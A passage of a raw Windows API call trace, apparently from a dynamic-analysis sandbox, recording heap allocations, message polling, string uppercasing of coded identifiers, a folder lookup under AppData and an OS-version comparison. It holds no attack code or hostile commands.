hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0209.105] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0209.105] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0209.105] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0209.105] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7d8 | out: hHeap=0x25c0000) returned 1 [0209.105] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa838 | out: hHeap=0x25c0000) returned 1 [0209.105] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0209.105] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7f0 | out: hHeap=0x25c0000) returned 1 [0209.105] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0209.105] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0209.105] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0209.105] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0209.105] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xd0) returned 0x249c7b0 [0209.105] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0209.105] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0209.105] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0209.105] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0209.106] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0209.106] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0209.106] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0209.106] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2d28 [0209.106] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0209.106] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0209.106] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7f0 [0209.106] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0209.106] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2088 [0209.106] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0209.106] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0209.106] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0209.106] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa838 [0209.106] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0209.106] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7d8 [0209.106] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0209.106] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7d8 | out: hHeap=0x25c0000) returned 1 [0209.106] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0209.106] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7d8 [0209.107] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa658 [0209.107] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d50 [0209.107] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0209.107] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dc8 [0209.107] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0209.107] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b98 [0209.107] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0209.107] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0209.107] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c68 [0209.107] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0209.107] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1948 [0209.107] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0209.107] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6ad0 [0209.107] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0209.107] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0209.107] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b69e0 [0209.107] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8f8 [0209.107] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1bf8 [0209.108] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8f8 | out: hHeap=0x25c0000) returned 1 [0209.108] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3a88 [0209.108] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8f8 [0209.108] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0209.108] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0209.108] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0209.108] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0209.108] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa370 [0209.108] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa808 [0209.108] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0209.108] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0209.108] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0209.108] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0209.108] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0209.108] CharUpperBuffW (in: lpsz="SSA0F00600E09", cchLength=0xd | out: lpsz="SSA0F00600E09") returned 0xd [0209.108] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0209.108] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0209.109] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0209.109] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa370 [0209.109] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0209.109] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0209.109] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa370 [0209.109] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0209.109] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0209.109] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0209.109] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0209.109] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0209.109] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0209.109] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0209.109] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Local/Deployment", lpFindFileData=0x8bf178 | out: lpFindFileData=0x8bf178*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x65e16800, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6adbe1a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x6adbe1a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfe0530, dwReserved1=0x7ca9, cFileName="Deployment", cAlternateFileName="DEPLOY~1")) returned 0xaa5960 [0209.109] FindClose (in: hFindFile=0xaa5960 | out: hFindFile=0xaa5960) returned 1 [0209.110] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0209.110] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0209.110] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0209.110] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0209.110] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0209.110] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0209.110] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0209.110] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0209.110] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0209.110] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0209.110] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa940 [0209.110] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0209.110] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0209.110] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0209.110] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0209.110] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0209.110] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0209.111] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0209.111] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0209.111] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16f8 [0209.111] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0209.111] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0209.111] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0209.111] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0209.111] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0209.111] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0209.111] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0209.111] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa48 [0209.111] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0209.111] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0209.111] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0209.111] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0209.111] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0209.111] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0209.112] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0209.112] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0209.112] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa48 [0209.112] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0209.112] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa940 [0209.112] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0209.112] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74d40000 [0209.112] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0209.112] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0209.112] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0209.112] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0209.113] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0209.113] CharUpperBuffW (in: lpsz="A5500B04258", cchLength=0xb | out: lpsz="A5500B04258") returned 0xb [0209.113] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0209.113] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0209.113] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0209.113] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0209.113] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0209.113] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0209.113] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0209.113] CharUpperBuffW (in: lpsz="SSA5500B04258", cchLength=0xd | out: lpsz="SSA5500B04258") returned 0xd [0209.113] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0209.113] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0209.113] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0209.113] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0209.113] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0209.114] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0209.114] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0209.114] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0209.114] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0209.114] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0209.114] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0209.114] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0209.114] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0209.114] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0209.114] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0209.114] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0209.114] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0209.114] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0209.114] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0209.115] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0209.115] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0209.115] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0209.115] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0209.115] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa4d8 [0209.115] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0209.115] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0209.115] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa400 [0209.115] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0209.115] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0209.115] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaad8 [0209.115] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0209.115] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0209.115] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0209.115] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0209.116] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0209.116] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0209.116] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0209.116] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0209.116] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0209.116] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0209.116] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0209.116] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0209.116] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0209.116] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0209.116] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_7", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0209.116] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0209.116] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0209.117] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0209.117] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0209.117] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0209.117] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0209.117] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0209.117] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0209.117] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0209.117] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0209.117] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0209.117] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0209.117] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0209.117] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0209.117] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0209.118] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0209.118] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0209.118] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aaad8 [0209.118] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0209.118] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0209.118] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0209.118] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0209.118] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0209.118] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0209.118] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0209.118] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0209.118] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0209.118] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0209.118] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0209.118] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0209.118] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0209.118] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0209.118] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0209.119] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0209.119] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0209.119] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0209.119] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0209.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0209.119] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0209.119] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0209.119] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, 